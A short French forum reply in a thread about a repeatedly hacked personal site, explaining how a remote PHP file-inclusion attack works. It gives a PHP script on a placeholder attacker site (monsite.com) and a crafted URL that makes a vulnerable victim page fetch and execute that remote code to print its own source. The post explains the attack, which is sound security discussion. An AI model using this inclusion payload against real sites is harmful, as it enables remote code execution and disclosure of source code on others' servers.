• [^] # Re: s/hacker/script kiddy/

    Posté par (site web personnel) . En réponse au journal site perso hacké à plusieurs reprises. Évalué à 3.

    effectivement, j'avais pas regardé le code dans ce cas si.

    Soit le fichier PHP suivant:

    ---------- http://monsite.com/script.php --------------
    <?php echo "<?php"; ?>
    echo htmlentities(implode('',file('print.php')));
    ?>
    ---------------------------------------------------------------

    Eh bien quand tu fera
    http://victime.com/print.php?id=http://monsite.com/script
    le echo "<?php"; sera interprété sur monsite.com
    et le htmlentities sera interprété sur victime.com

    Tu comprends mieux ? Enfin moi ça me parait logique.